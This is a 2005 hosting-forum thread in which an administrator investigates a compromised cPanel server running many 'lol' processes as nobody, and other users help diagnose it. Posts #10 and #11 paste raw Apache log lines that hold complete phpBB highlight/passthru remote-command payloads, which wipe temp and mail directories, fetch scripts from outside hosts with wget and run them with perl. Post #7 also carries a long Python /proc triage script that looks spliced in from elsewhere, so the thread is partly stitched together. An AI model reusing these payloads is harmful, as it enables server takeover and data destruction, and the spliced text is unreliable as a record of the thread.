Thread: Process running as nobody
-
01-12-2005, 08:16 AM #1
Process running as nobody
Hi all,
Below is a copy of my top
Code:
12:14:26 up 50 days, 59 min, 1 user, load average: 0.39, 0.42, 0.59
257 processes: 252 sleeping, 1 running, 0 zombie, 4 stopped
CPU states: 15.2% user 5.5% system 0.0% nice 0.0% iowait 79.1% idle
Mem: 514196k av, 502628k used, 11568k free, 0k shrd, 112768k buff
     156332k active, 310968k inactive
Swap: 2104504k av, 196156k used, 1908348k free 145632k cached

  PID USER     PRI  NI  SIZE  RSS SHARE STAT %CPU %MEM   TIME CPU COMMAND
 2465 root      19   0  1184 1184   804 R     5.5  0.2   0:01   0 top
31482 nobody    10   0   608  604   548 S     1.3  0.1   0:10   0 ./lol 30
 1089 root      19  19 33184  13M 10400 S N   0.9  2.7  1646m   0 ./server_linux -PID=tsserver2.pid
28521 nobody    10   0   576  572   516 S     0.9  0.1   0:05   0 ./lol 30
28523 nobody    10   0   576  572   516 S     0.9  0.1   0:05   0 ./lol 30
19621 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20010 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20014 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20028 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20469 nobody     9   0   620  616   560 S     0.4  0.1   0:12   0 ./lol 30
20610 nobody     9   0   620  616   560 S     0.4  0.1   0:12   0 ./lol 30
22113 nobody     9   0   612  608   552 S     0.4  0.1   0:11   0 ./lol 30
23021 nobody     9   0   608  604   548 S     0.4  0.1   0:10   0 ./lol 30
23096 nobody     9   0   604  600   544 S     0.4  0.1   0:10   0 ./lol 30
23497 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
23506 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
24227 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
24229 nobody     9   0   600  596   540 S     0.4  0.1   0:09   0 ./lol 30
25163 nobody     9   0   596  592   536 S     0.4  0.1   0:08   0 ./lol 30
26179 nobody     9   0   584  580   524 S     0.4  0.1   0:07   0 ./lol 30
26561 nobody     9   0   584  580   524 S     0.4  0.1   0:06   0 ./lol 30
27201 nobody     9   0   580  576   520 S     0.4  0.1   0:06   0 ./lol 30
28045 nobody     9   0   576  572   516 S     0.4  0.1   0:06   0 ./lol 30
28381 nobody     9   0   576  572   516 S     0.4  0.1   0:05   0 ./lol 30
28529 nobody     9   0   528  524   464 S     0.4  0.1   0:08   0 ./lol 30
28634 nobody     9   0   524  520   460 S     0.4  0.1   0:08   0 ./lol 30
28860 nobody     9   0   524  520   460 S     0.4  0.1   0:08   0 ./lol 30
30670 nobody     9   0   544  540   484 S     0.4  0.1   0:01   0 ./lol 30
31106 nobody     9   0   612  608   552 S     0.4  0.1   0:11   0 ./lol 30
31254 nobody     9   0   608  604   548 S     0.4  0.1   0:11   0 ./lol 30
    1 root       8   0   472  440   424 S     0.0  0.0   0:58   0 init [3]
    2 root       9   0     0    0     0 SW    0.0  0.0   0:01   0 keventd
    3 root       9   0     0    0     0 SW    0.0  0.0   2:32   0 kapmd
    4 root      19  19     0    0     0 SWN   0.0  0.0   0:00   0 ksoftirqd_CPU0
    5 root       9   0     0    0     0 SW    0.0  0.0   7:31   0 kswapd
    6 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 bdflush
    7 root       9   0     0    0     0 SW    0.0  0.0   2:02   0 kupdated
    8 root 18446744073709551615 -20 0 0  0 SW<   0.0  0.0   0:00   0 mdrecoveryd
   58 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 khubd
  277 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 kjournald
  278 root       9   0     0    0     0 SW    0.0  0.0   4:17   0 kjournald
  279 root       9   0     0    0     0 SW    0.0  0.0   1:25   0 kjournald
  280 root       9   0     0    0     0 SW    0.0  0.0   6:15   0 kjournald
  281 root       9   0     0    0     0 SW    0.0  0.0   3:22   0 kjournald
  750 root       9   0   556  520   476 S     0.0  0.1   3:41   0 syslogd -m 0
  754 root       9   0   420  368   368 S     0.0  0.0   0:00   0 klogd -x
 4411 root       9   0   984  776   776 S     0.0  0.1   0:00   0 /bin/bash
 4414 root       9   0   940  804   788 S     0.0  0.1   0:38   0 /usr/sbin/sshd
 4428 root       8   0   752  668   620 S     0.0  0.1   0:04   0 xinetd -stayalive -pidfile /var/run/xinetd.pid
 4670 root       8   0   580  568   524 S     0.0  0.1   0:18   0 crond
I have checked /tmp (which is non-executable) and /var/tmp (again the same), and have just checked /dev/shm (which isn't non-executable).
I removed a few files from there.
I have tried killing the processes, however more seem to appear.
Can anyone help?
Thanks
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.
-
01-12-2005, 08:20 AM #2
Try running:
killall -9 lol
To find the file you can use:
locate lol
You may also want to install and run rkhunter and/or chkrootkit.
-
01-12-2005, 08:39 AM #3
Looks like your box has been exploited.
-
01-12-2005, 08:40 AM #4
If I remember correctly, lol is a DoS tool, and I suspect you'll find your attacker got in via an insecure web script (check things like phpBB and Coppermine versions).
Check /var/tmp and /tmp for directories such as ". . " and the like.
-
01-12-2005, 08:51 AM #5
Yep, check tmp, or kill all processes running as nobody.
-
01-12-2005, 11:14 AM #6
Hi there,
I have run locate lol before, however nothing out of the ordinary comes up, just a lot of .gif files.
I'm running updatedb and then going to try locate again to see if anything new comes up.
I have double-checked all directories and removed some more "." folders.
Does anyone have a URL or any more information on the lol DoS tool, so I can isolate it and prevent it in the future?
//EDIT: Just found lots of files in /usr/local/apache/proxy.
One dir is Strobe, which is a port prober. There is also a dir called scan, which contains the lol files, and a dir called flood. Is it safe to remove the dir called flood?
Also, does Apache need the folder called proxy? If so, what folders does it need? There is also httpd -DSSL in it; is that another trick?
Thanks
Last edited by Veus; 01-12-2005 at 11:24 AM.
-
01-12-2005, 11:37 AM #7
Yes, that's a trick; we've seen the same (hackers'?) tools on one of our customers' servers repeatedly. Out of interest, is this a cPanel server?
They used a file called httpd -DSSL as well as various other renaming tricks. Also included were psyBNCs and bots. Most of their stuff they kept in /tmp and /var/tmp, although I did find stuff elsewhere. Try looking in your Apache logs for wget.
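An added example, not part of the thread, that does the check the posts above are circling around. `locate` only finds what `updatedb` has indexed, and `top` prints argv[0], which a dropper can set to anything (hence a file called "httpd -DSSL"). Reading /proc directly gives the kernel's view of each process's real binary, working directory and parent, and flags the patterns seen here: a binary under a drop directory, a binary deleted after launch, or argv[0] that does not match the executing file. The sample records are constructed, modelled on the `top` output in post #1; their exe and cwd values are assumptions for illustration, since `top` does not show them. One caveat the thread does not spell out: mounting /tmp noexec does not stop `perl sess_...`, because the interpreter is what gets executed, not the downloaded file.

```python
import os
import pwd
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid exe cwd cmdline")

# Directories the payloads in this thread cd into and download to; a process whose
# binary or working directory is under one of them deserves a look.
DROP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/spool/mail/", "/var/mail/",
             "/usr/local/apache/proxy/")


def _readlink(path):
    try:
        return os.readlink(path)
    except OSError:            # kernel thread, or no permission to inspect it
        return "?"


def procs_for_user(user=None):
    """Processes whose real UID is `user` (name, numeric uid, or None for the
    caller), read straight from /proc instead of trusting top/ps output.
    exe is the kernel's record of the running binary, so argv[0] games do not
    hide it, and a binary removed after launch still appears with ' (deleted)'.
    Linux only."""
    if user is None:
        uid = os.getuid()
    elif str(user).isdigit():
        uid = int(user)
    else:
        uid = pwd.getpwnam(user).pw_uid
    found = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/status") as fh:
                status = dict(line.rstrip("\n").split(":\t", 1)
                              for line in fh if ":\t" in line)
            if int(status["Uid"].split()[0]) != uid:      # first field is the real uid
                continue
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
        except (OSError, KeyError, ValueError):
            continue                                       # exited mid-scan or unreadable
        found.append(Proc(pid, int(status["PPid"]), _readlink(f"/proc/{pid}/exe"),
                          _readlink(f"/proc/{pid}/cwd"), cmdline))
    return sorted(found)


def self_record():
    """This process's own entry; a cheap check that /proc is readable."""
    mine = os.getpid()
    return next((p for p in procs_for_user() if p.pid == mine), None)


def suspicious(procs):
    """Return [(Proc, [reasons])] for entries worth triage: binary deleted after
    exec, running from a drop directory, or argv[0] naming a different program
    than the file that is actually executing. Interpreters (python3 vs
    python3.11) trip the last rule too, so treat the output as a shortlist."""
    hits = []
    for p in procs:
        reasons = []
        deleted = p.exe.endswith(" (deleted)")
        exe_path = p.exe[:-len(" (deleted)")] if deleted else p.exe
        if deleted:
            reasons.append("binary deleted after exec")
        if exe_path.startswith(DROP_DIRS) or (p.cwd + "/").startswith(DROP_DIRS):
            reasons.append("lives in a drop directory")
        argv0 = p.cmdline.split()[0] if p.cmdline else ""
        if argv0 and exe_path != "?" and \
                os.path.basename(argv0) != os.path.basename(exe_path):
            reasons.append(f"argv[0] {argv0!r} does not match {exe_path}")
        if reasons:
            hits.append((p, reasons))
    return hits


# Constructed records modelled on the top output in post #1. exe/cwd values are
# assumptions for illustration (top does not show them), not data from the thread.
SAMPLE_PROCS = [
    Proc(31482, 1, "/usr/local/apache/proxy/scan/lol", "/usr/local/apache/proxy/scan", "./lol 30"),
    Proc(30670, 1, "/tmp/sess_189f0f0889555397a4de5485dd611111 (deleted)", "/tmp", "./lol 30"),
    Proc(28529, 4428, "/usr/local/apache/proxy/httpd -DSSL", "/usr/local/apache/proxy", "./httpd -DSSL"),
    Proc(1089, 1, "/opt/teamspeak/server_linux", "/opt/teamspeak", "./server_linux -PID=tsserver2.pid"),
    Proc(4414, 1, "/usr/sbin/sshd", "/", "/usr/sbin/sshd"),
]

if __name__ == "__main__":
    try:
        live = procs_for_user("nobody")
    except (KeyError, OSError):
        live = []
    for p, why in suspicious(live or SAMPLE_PROCS):
        print(f"{p.pid:>6} ppid={p.ppid:<6} exe={p.exe}  cwd={p.cwd}  cmd={p.cmdline}")
        for r in why:
            print("        ->", r)
```

Run it as root on the affected box so every nobody process is readable; the exe column is what to kill and copy off for analysis, and the ppid column tells you whether the children are being respawned by one parent (the "more seem to appear" symptom in post #1) rather than by fresh requests through the web server.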
-
01-12-2005, 11:53 AM #8
That's the same as what I found: quite a few psyBNCs and a few bots. I'll have a look, thanks.
Yes, it is a cPanel server.
I'm running grep -i wget * on my logs now to find which user is being careless!
-
01-12-2005, 12:18 PM #9
We found it was an old version of the Coppermine gallery software that was causing the problems (they were running 1.2, and 1.3.something is the latest secure version).
-
01-12-2005, 12:20 PM #10
After searching for wget in the domlogs I have found the following entries:
Code:
/usr/local/apache/domlogs/domain.com:209.126.164.246 - - [01/Jan/2005:21:58:17 +0000] "GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 47435 "-" "LWP::Simple/5.43"

/usr/local/apache/domlogs/domain.com:70.84.39.148 - - [02/Jan/2005:09:15:23 +0000] "GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 67361 "-" "LWP::Simple/5.803"

/usr/local/apache/domlogs/domain.com:203.24.100.137 - - [02/Jan/2005:11:25:51 +0000] "GET /showthread.php?t=9722&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.0" 200 73304 "-" "LWP::Simple/5.64"

/usr/local/apache/domlogs/domain.com:208.234.15.155 - - [03/Jan/2005:22:47:40 +0000] "GET /printthread.php?t=9849&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 6881 "-" "LWP::Simple/5.63"

/usr/local/apache/domlogs/domain.com:193.210.126.79 - - [10/Jan/2005:04:30:31 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.79"

/usr/local/apache/domlogs/domain.com:209.152.178.80 - - [10/Jan/2005:23:34:51 +0000] "GET /printthread.php?t=471&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2852 "-" "LWP::Simple/5.63"

/usr/local/apache/domlogs/domain.com:209.152.178.80 - - [11/Jan/2005:07:45:01 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.63"
-
01-12-2005, 03:13 PM #11
Code:
GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527

is

